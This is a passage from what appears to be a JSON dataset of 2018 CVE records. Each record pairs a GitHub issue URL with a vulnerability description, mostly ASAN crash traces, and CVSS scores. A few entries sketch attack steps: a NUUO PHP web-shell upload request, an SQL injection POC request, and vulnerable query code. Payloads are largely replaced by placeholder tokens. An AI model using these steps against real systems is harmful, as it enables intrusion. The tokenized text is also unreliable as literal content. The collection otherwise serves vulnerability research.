  19573. "description": "Double free in jpegoptim. I have come across a double free in jpegoptim. Please see the ASAN report below. The crash file test case can be found FILETAG . This was found in commit APITAG The command to compile the binary is as follows: ERRORTAG This double free could be used to assist in exploiting the software via heap manipulation resulting in code execution. ERRORTAG",
  19574. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19575. "severity": "HIGH",
  19576. "baseScore": 8.8,
  19577. "impactScore": 5.9,
  19578. "exploitabilityScore": 2.8
  19579. },
  19580. {
  19581. "CVE_ID": "CVE-2018-11418",
  19582. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/2237",
  19583. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/2237",
  19584. "Repo_new": "jerryscript-project/jerryscript",
  19585. "Issue_Created_At": "2018-03-08T07:44:13Z",
  19586. "description": "heap buffer overflow in lit_read_code_unit_from_utf8. (new APITAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f NUMBERTAG f at pc NUMBERTAG ff NUMBERTAG bp NUMBERTAG ffe3dc NUMBERTAG sp NUMBERTAG ffe3dc NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f NUMBERTAG f thread T NUMBERTAG ff NUMBERTAG in lit_read_code_unit_from_utf8 PATHTAG NUMBERTAG ff NUMBERTAG in lit_utf8_peek_next PATHTAG NUMBERTAG e0c0 in re_parse_char_class PATHTAG NUMBERTAG a7b5 in re_parse_alternative PATHTAG NUMBERTAG b5f7 in re_compile_bytecode PATHTAG NUMBERTAG e NUMBERTAG in ecma_op_create_regexp_object PATHTAG NUMBERTAG bf NUMBERTAG b in APITAG PATHTAG NUMBERTAG a0e9d in APITAG PATHTAG NUMBERTAG b3 in opfunc_construct PATHTAG NUMBERTAG b3 in vm_execute PATHTAG NUMBERTAG a0d in vm_run PATHTAG NUMBERTAG a0d in vm_run_global PATHTAG NUMBERTAG in jerry_run PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ea NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG f8e9 ( PATHTAG NUMBERTAG f NUMBERTAG f is located NUMBERTAG bytes to the right of NUMBERTAG byte region NUMBERTAG f NUMBERTAG f NUMBERTAG f) allocated by thread T0 here NUMBERTAG f7a1edee in malloc ( PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in jmem_heap_gc_and_alloc_block PATHTAG NUMBERTAG f NUMBERTAG in jmem_heap_alloc_block PATHTAG NUMBERTAG aa in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG a in parser_compute_indicies PATHTAG NUMBERTAG a in parser_post_processing PATHTAG NUMBERTAG f8a in parser_parse_source PATHTAG NUMBERTAG c NUMBERTAG in parser_parse_script PATHTAG NUMBERTAG f NUMBERTAG in jerry_parse PATHTAG NUMBERTAG f NUMBERTAG in jerry_parse_named_resource PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ea NUMBERTAG in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG lit_read_code_unit_from_utf8 Shadow bytes around the buggy address NUMBERTAG ec NUMBERTAG fa fa fa fa fa 
fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG e0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fd fa NUMBERTAG ec NUMBERTAG f0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG ec NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  19587. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19588. "severity": "CRITICAL",
  19589. "baseScore": 9.8,
  19590. "impactScore": 5.9,
  19591. "exploitabilityScore": 3.9
  19592. },
  19593. {
  19594. "CVE_ID": "CVE-2018-11419",
  19595. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/2230",
  19596. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/2230",
  19597. "Repo_new": "jerryscript-project/jerryscript",
  19598. "Issue_Created_At": "2018-03-01T06:28:57Z",
  19599. "description": "heap buffer overflow in lit_read_code_unit_from_hex. samiliar bug with NUMBERTAG new APITAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f NUMBERTAG c at pc NUMBERTAG f9f5a bp NUMBERTAG ffdf2a NUMBERTAG sp NUMBERTAG ffdf2a NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f NUMBERTAG c thread T NUMBERTAG f9f NUMBERTAG in lit_read_code_unit_from_hex PATHTAG NUMBERTAG df NUMBERTAG in re_parse_char_class PATHTAG NUMBERTAG a7b5 in re_parse_alternative PATHTAG NUMBERTAG b5f7 in re_compile_bytecode PATHTAG NUMBERTAG e NUMBERTAG in ecma_op_create_regexp_object PATHTAG NUMBERTAG bf NUMBERTAG b in APITAG PATHTAG NUMBERTAG a0e9d in APITAG PATHTAG NUMBERTAG b3 in opfunc_construct PATHTAG NUMBERTAG b3 in vm_execute PATHTAG NUMBERTAG a0d in vm_run PATHTAG NUMBERTAG a0d in vm_run_global PATHTAG NUMBERTAG in jerry_run PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG f8e9 ( PATHTAG NUMBERTAG f NUMBERTAG c is located NUMBERTAG bytes to the right of NUMBERTAG byte region NUMBERTAG f NUMBERTAG f NUMBERTAG c) allocated by thread T0 here NUMBERTAG f NUMBERTAG dee in malloc ( PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in jmem_heap_gc_and_alloc_block PATHTAG NUMBERTAG f NUMBERTAG in jmem_heap_alloc_block PATHTAG NUMBERTAG aa in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG a in parser_compute_indicies PATHTAG NUMBERTAG a in parser_post_processing PATHTAG NUMBERTAG f8a in parser_parse_source PATHTAG NUMBERTAG c NUMBERTAG in parser_parse_script PATHTAG NUMBERTAG f NUMBERTAG in jerry_parse PATHTAG NUMBERTAG f NUMBERTAG in jerry_parse_named_resource PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG lit_read_code_unit_from_hex Shadow bytes around the buggy address NUMBERTAG eb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb 
NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb NUMBERTAG e0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fd fa NUMBERTAG eb NUMBERTAG f0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG eb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG eb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  19600. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19601. "severity": "CRITICAL",
  19602. "baseScore": 9.8,
  19603. "impactScore": 5.9,
  19604. "exploitabilityScore": 3.9
  19605. },
  19606. {
  19607. "CVE_ID": "CVE-2018-11440",
  19608. "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/575",
  19609. "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/575",
  19610. "Repo_new": "liblouis/liblouis",
  19611. "Issue_Created_At": "2018-05-25T10:12:07Z",
  19612. "description": "ASAn stack based buffer overflow in APITAG APITAG FILETAG Tested version NUMBERTAG and commit APITAG Might be related to: CVETAG Credit: Henri Salo ERRORTAG",
  19613. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19614. "severity": "HIGH",
  19615. "baseScore": 8.8,
  19616. "impactScore": 5.9,
  19617. "exploitabilityScore": 2.8
  19618. },
  19619. {
  19620. "CVE_ID": "CVE-2018-11468",
  19621. "Issue_Url_old": "https://github.com/Orc/discount/issues/189",
  19622. "Issue_Url_new": "https://github.com/orc/discount/issues/189",
  19623. "Repo_new": "orc/discount",
  19624. "Issue_Created_At": "2018-05-23T09:44:58Z",
  19625. "description": "Several heap buffer overflow issues have been found.. A buffer overflow has been discovered. The information is displayed as follows: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG a NUMBERTAG a at pc NUMBERTAG f7e7a5e7df8 bp NUMBERTAG ffe NUMBERTAG efa NUMBERTAG sp NUMBERTAG ffe NUMBERTAG ef1f8 READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG a NUMBERTAG a thread T NUMBERTAG f7e7a5e7df7 in __asan_memmove ( PATHTAG NUMBERTAG b NUMBERTAG in memmove PATHTAG NUMBERTAG b NUMBERTAG in __mkd_trim_line PATHTAG NUMBERTAG e0 in codeblock PATHTAG NUMBERTAG e0 in compile PATHTAG NUMBERTAG a NUMBERTAG e in compile_document PATHTAG NUMBERTAG a NUMBERTAG e in mkd_compile PATHTAG NUMBERTAG c in main PATHTAG NUMBERTAG f7e7a1b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG a is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f7e7a5f NUMBERTAG in malloc ( PATHTAG NUMBERTAG e NUMBERTAG d in splitline PATHTAG NUMBERTAG e NUMBERTAG d in htmlblock PATHTAG SUMMARY: APITAG heap buffer overflow NUMBERTAG asan_memmove Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fd fd fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff 
NUMBERTAG fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING The input test case is at: URLTAG The executable file is mkd2html.",
  19626. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19627. "severity": "MEDIUM",
  19628. "baseScore": 5.5,
  19629. "impactScore": 3.6,
  19630. "exploitabilityScore": 1.8
  19631. },
  19632. {
  19633. "CVE_ID": "CVE-2018-11472",
  19634. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/445",
  19635. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/445",
  19636. "Repo_new": "monstra-cms/monstra",
  19637. "Issue_Created_At": "2018-05-22T19:58:56Z",
  19638. "description": "Reflected XSS in Login. Reflected XSS in Login Below is the post request and the screenshot attached POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG login=\"> APITAG APITAG FILETAG FILETAG",
  19639. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  19640. "severity": "MEDIUM",
  19641. "baseScore": 6.1,
  19642. "impactScore": 2.7,
  19643. "exploitabilityScore": 2.8
  19644. },
  19645. {
  19646. "CVE_ID": "CVE-2018-11473",
  19647. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/446",
  19648. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/446",
  19649. "Repo_new": "monstra-cms/monstra",
  19650. "Issue_Created_At": "2018-05-22T20:21:21Z",
  19651. "description": "XSS in registration Form. XSS in registration Form Below is the post request that is causing the pop up..here all the fields are vulnerable POST PATHTAG HTTP NUMBERTAG Host: localhost Cache Control: no cache Referer: URLTAG Accept: PATHTAG / ;q NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept Language: en us,en;q NUMBERTAG Cookie: PHPSESSID=xxxx; login_attempts=i NUMBERTAG A NUMBERTAG B Accept Encoding: gzip, deflate Content Length NUMBERTAG Content Type: application/x www form urlencoded APITAG APITAG APITAG",
  19652. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  19653. "severity": "MEDIUM",
  19654. "baseScore": 6.1,
  19655. "impactScore": 2.7,
  19656. "exploitabilityScore": 2.8
  19657. },
  19658. {
  19659. "CVE_ID": "CVE-2018-11474",
  19660. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/444",
  19661. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/444",
  19662. "Repo_new": "monstra-cms/monstra",
  19663. "Issue_Created_At": "2018-05-22T19:38:13Z",
  19664. "description": "Session Management Issue in Administrations Tab. Session Management Issue in Administrations Tab link: URLTAG You need two browsers for exploitation NUMBERTAG Go to users settings in both the browsers NUMBERTAG update your password in one browser and click on save APITAG move to other browser and try to add some information like name and all. i.e it is not asking for reauthentication after password change.. The other browser doesnt log you out because of password APITAG an attacker can edit any information... If an attacker had already logged in once..No matter how many times the victim changes his password, the attacker would be able to access the victim's account. Refer to owasp for session management",
  19665. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  19666. "severity": "HIGH",
  19667. "baseScore": 8.0,
  19668. "impactScore": 5.9,
  19669. "exploitabilityScore": 2.1
  19670. },
  19671. {
  19672. "CVE_ID": "CVE-2018-11475",
  19673. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/443",
  19674. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/443",
  19675. "Repo_new": "monstra-cms/monstra",
  19676. "Issue_Created_At": "2018-05-22T19:37:16Z",
  19677. "description": "Session Management in users. Session Management Issue in Users tab link: URLTAG You need two browsers for exploitation NUMBERTAG Go to users settings in both the browsers NUMBERTAG update your password in one browser and click on save APITAG move to other browser and try to add some information like name and all. i.e it is not asking for reauthentication after password change.. The other browser doesnt log you out because of password APITAG an attacker can edit any information... If an attacker had already logged in once..No matter how many times the victim changes his password, the attacker would be able to access the victim's account. Refer to owasp for session management",
  19678. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  19679. "severity": "HIGH",
  19680. "baseScore": 8.0,
  19681. "impactScore": 5.9,
  19682. "exploitabilityScore": 2.1
  19683. },
  19684. {
  19685. "CVE_ID": "CVE-2018-11487",
  19686. "Issue_Url_old": "https://github.com/gaozhifeng/PHPMyWind/issues/2",
  19687. "Issue_Url_new": "https://github.com/gaozhifeng/phpmywind/issues/2",
  19688. "Repo_new": "gaozhifeng/phpmywind",
  19689. "Issue_Created_At": "2018-05-25T07:53:39Z",
  19690. "description": "page.php maybe has some vul. When I visit the next three url, the source code of the page will be injected my code at the location of page number area. URLTAG APITAG FILETAG APITAG FILETAG APITAG Then, you can use browser check the source code cf the page, you will find the payload code in the code where is page number area. The vul coursed by the \"$nowurl\" in APITAG",
  19691. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  19692. "severity": "MEDIUM",
  19693. "baseScore": 6.1,
  19694. "impactScore": 2.7,
  19695. "exploitabilityScore": 2.8
  19696. },
  19697. {
  19698. "CVE_ID": "CVE-2018-11490",
  19699. "Issue_Url_old": "https://github.com/pts/sam2p/issues/38",
  19700. "Issue_Url_new": "https://github.com/pts/sam2p/issues/38",
  19701. "Repo_new": "pts/sam2p",
  19702. "Issue_Created_At": "2018-05-24T02:27:21Z",
  19703. "description": "Heap Buffer Overflow NUMBERTAG in function APITAG in cgif.c. Here is the bug NUMBERTAG if APITAG != NO_SUCH_CODE NUMBERTAG APITAG APITAG NUMBERTAG APITAG the APITAG APITAG NUMBERTAG should be checked if it is less than LZ_MAX_CODE. The crash is as follows: (gdb) run crash NUMBERTAG FILETAG Program received signal SIGSEGV, Segmentation fault NUMBERTAG aa in APITAG APITAG \"\", APITAG APITAG at APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG (gdb) bt NUMBERTAG aa in APITAG APITAG \"\", APITAG APITAG at APITAG NUMBERTAG eb in APITAG APITAG Line=<optimized out>, APITAG out>) at APITAG NUMBERTAG ba in APITAG APITAG at APITAG NUMBERTAG d in in_gif_reader (ufd=<optimized out>) at APITAG NUMBERTAG fca8 in Image::load (ufd NUMBERTAG a NUMBERTAG APITAG format=format APITAG at APITAG NUMBERTAG eb0 in run_sam2p_engine (sout=..., serr=..., arg NUMBERTAG optimized out>, helpp=helpp APITAG at APITAG NUMBERTAG d0 in main (arg NUMBERTAG fffffffe5c8) at APITAG (gdb) p Private APITAG NUMBERTAG gdb)",
  19704. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19705. "severity": "HIGH",
  19706. "baseScore": 8.8,
  19707. "impactScore": 5.9,
  19708. "exploitabilityScore": 2.8
  19709. },
  19710. {
  19711. "CVE_ID": "CVE-2018-11493",
  19712. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/137",
  19713. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/137",
  19714. "Repo_new": "wuzhicms/wuzhicms",
  19715. "Issue_Created_At": "2018-05-23T09:26:58Z",
  19716. "description": "There is a CSRF vulnerability that can add links to friendship. After the administrator logs in, open this page poc FILETAG APITAG a friendship link ERRORTAG",
  19717. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19718. "severity": "HIGH",
  19719. "baseScore": 8.8,
  19720. "impactScore": 5.9,
  19721. "exploitabilityScore": 2.8
  19722. },
  19723. {
  19724. "CVE_ID": "CVE-2018-11496",
  19725. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/96",
  19726. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/96",
  19727. "Repo_new": "ckolivas/lrzip",
  19728. "Issue_Created_At": "2018-05-25T01:57:28Z",
  19729. "description": "heap use after free in read_stream APITAG In the latest commit master ed NUMBERTAG e1 URLTAG , there is a heap use after free in read_stream function APITAG With ASAN cflags \" fsanitize=address\", use the POC attached will trigger the vulnerability. Command to reproduce: APITAG The ASAN backtrace info: ERRORTAG when compile without ASAN flags, lrzip will crash because of double free ERRORTAG APITAG was freed in APITAG in APITAG CODETAG in the below code, the APITAG may be freed in APITAG , but with while the s >buf will be used again in memcpy in line NUMBERTAG and may be free again in fill_buffer in NUMBERTAG which caused heap use after free and double free. ERRORTAG FILETAG",
  19730. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19731. "severity": "MEDIUM",
  19732. "baseScore": 6.5,
  19733. "impactScore": 3.6,
  19734. "exploitabilityScore": 2.8
  19735. },
  19736. {
  19737. "CVE_ID": "CVE-2018-11498",
  19738. "Issue_Url_old": "https://github.com/inikep/lizard/issues/16",
  19739. "Issue_Url_new": "https://github.com/inikep/lizard/issues/16",
  19740. "Repo_new": "inikep/lizard",
  19741. "Issue_Created_At": "2018-05-03T02:10:03Z",
  19742. "description": "Negative size passed to memcpy resulting in memory corruption APITAG Hey there, I have come across a vulnerability in the lizard decompressor, whereby a negative size integer is passed to APITAG . This occurs in APITAG URLTAG . APITAG Since APITAG takes the length and treats it as a APITAG , this results in an excessive copy from APITAG into op . APITAG This was found while fuzzing commit APITAG (current latest as of this date). By controlling the number of bytes passed as length , this results in memory corruption which leads to execution control. Find the POC file here: FILETAG . As follows is the ASAN output: ERRORTAG",
  19743. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19744. "severity": "HIGH",
  19745. "baseScore": 7.8,
  19746. "impactScore": 5.9,
  19747. "exploitabilityScore": 1.8
  19748. },
  19749. {
  19750. "CVE_ID": "CVE-2018-11500",
  19751. "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/11",
  19752. "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/11",
  19753. "Repo_new": "sanluan/publiccms",
  19754. "Issue_Created_At": "2018-05-25T04:04:42Z",
  19755. "description": "There is a CSRF vulnerability that can add the administrator account. The Add administrator Function is not check referer and token POC: ERRORTAG Building a page and inducing administrator access can add a user with super privileges.",
  19756. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19757. "severity": "HIGH",
  19758. "baseScore": 8.8,
  19759. "impactScore": 5.9,
  19760. "exploitabilityScore": 2.8
  19761. },
  19762. {
  19763. "CVE_ID": "CVE-2018-11507",
  19764. "Issue_Url_old": "https://github.com/FLIF-hub/FLIF/issues/509",
  19765. "Issue_Url_new": "https://github.com/flif-hub/flif/issues/509",
  19766. "Repo_new": "flif-hub/flif",
  19767. "Issue_Created_At": "2018-05-27T17:18:15Z",
  19768. "description": "CVETAG resource exhaustion. FLIF uses huge amount of CPU and memory in function image_load_pnm at image/image APITAG when processing following file: FILETAG FILETAG",
  19769. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19770. "severity": "MEDIUM",
  19771. "baseScore": 6.5,
  19772. "impactScore": 3.6,
  19773. "exploitabilityScore": 2.8
  19774. },
  19775. {
  19776. "CVE_ID": "CVE-2018-11515",
  19777. "Issue_Url_old": "https://github.com/DediData/wpforo/issues/1",
  19778. "Issue_Url_new": "https://github.com/dedidata/wpforo/issues/1",
  19779. "Repo_new": "DediData/wpforo",
  19780. "Issue_Created_At": "2018-05-27T12:40:35Z",
  19781. "description": "Sql injection directly get the administrator account and password. No login APITAG is sql injection on the search\u3002 poc: APITAG APITAG posts HTTP NUMBERTAG Host: gvectors.com User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG APITAG APITAG _gat NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG",
  19782. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19783. "severity": "CRITICAL",
  19784. "baseScore": 9.8,
  19785. "impactScore": 5.9,
  19786. "exploitabilityScore": 3.9
  19787. },
  19788. {
  19789. "CVE_ID": "CVE-2018-11522",
  19790. "Issue_Url_old": "https://github.com/IceEnd/Yosoro/issues/11",
  19791. "Issue_Url_new": "https://github.com/iceend/yosoro/issues/11",
  19792. "Repo_new": "iceend/yosoro",
  19793. "Issue_Created_At": "2018-05-17T11:37:23Z",
  19794. "description": "FILETAG Expected behavior This cross site scripting vulnerability allows an attacker to execute arbitrary code on the victims machine by creating a malicious note. In the worst case this will lead to a reverse shell. I am not going to paste the code for the reverse shell here for obvious reasons.",
  19795. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  19796. "severity": "MEDIUM",
  19797. "baseScore": 6.1,
  19798. "impactScore": 2.7,
  19799. "exploitabilityScore": 2.8
  19800. },
  19801. {
  19802. "CVE_ID": "CVE-2018-11523",
  19803. "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/1",
  19804. "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/1",
  19805. "Repo_new": "unh3x/just4cve",
  19806. "Issue_Created_At": "2018-05-28T12:37:21Z",
  19807. "description": "NUUO APITAG / APITAG Arbitrary File Upload Vulnerability. NUUO APITAG / APITAG Arbitrary File Upload Vulnerability ========================== Advisory: NUUO APITAG / APITAG Arbitrary File Upload Vulnerability Author: M3 MENTIONTAG From APITAG Affected Version: All ========================== Vulnerability Description ========================== Recetly, I found an Arbitrary File Upload Vulnerability in 'NUUO APITAG program, APITAG is widely used all over the world. Vulnerable cgi: FILETAG APITAG As the code above, no any filter, so we can upload a php shell directly to the web server. ========================== POC && EXP NUMBERTAG Upload APITAG to web root path: POST FILETAG HTTP NUMBERTAG Host: APITAG Accept Encoding: gzip, deflate Accept: / Accept Language: en User Agent: Mozilla NUMBERTAG compatible; MSIE NUMBERTAG Windows NT NUMBERTAG Win NUMBERTAG Trident NUMBERTAG Connection: close Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Content Disposition: form data; name=\"userfile\"; APITAG APITAG NUMBERTAG Check if the php file is uploaded successfully: GET FILETAG If the page returns phpinfo info, target is vulnerable! Just enjoy it!",
  19808. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19809. "severity": "CRITICAL",
  19810. "baseScore": 9.8,
  19811. "impactScore": 5.9,
  19812. "exploitabilityScore": 3.9
  19813. },
  19814. {
  19815. "CVE_ID": "CVE-2018-11528",
  19816. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/138",
  19817. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/138",
  19818. "Repo_new": "wuzhicms/wuzhicms",
  19819. "Issue_Created_At": "2018-05-28T05:41:32Z",
  19820. "description": "\u4e94\u6307CMS NUMBERTAG SQL\u6ce8\u5165. \u6f0f\u6d1ePOC\uff1a APITAG APITAG PATHTAG APITAG NUMBERTAG require PATHTAG require APITAG if(!isset($GLOBALS['param'])) { APITAG } elseif($GLOBALS['param']=='') { APITAG } $code = APITAG $posttime = SYS_TIME NUMBERTAG db = load_class('db'); $r = $db >get_one('sms_checkcode',\" code ='$code' AND posttime >$posttime NUMBERTAG id DESC'); if($r) { APITAG } else { APITAG } APITAG \u5b98\u7f51\u5df2\u7ecf\u590d\u73b0\u6210\u529f.",
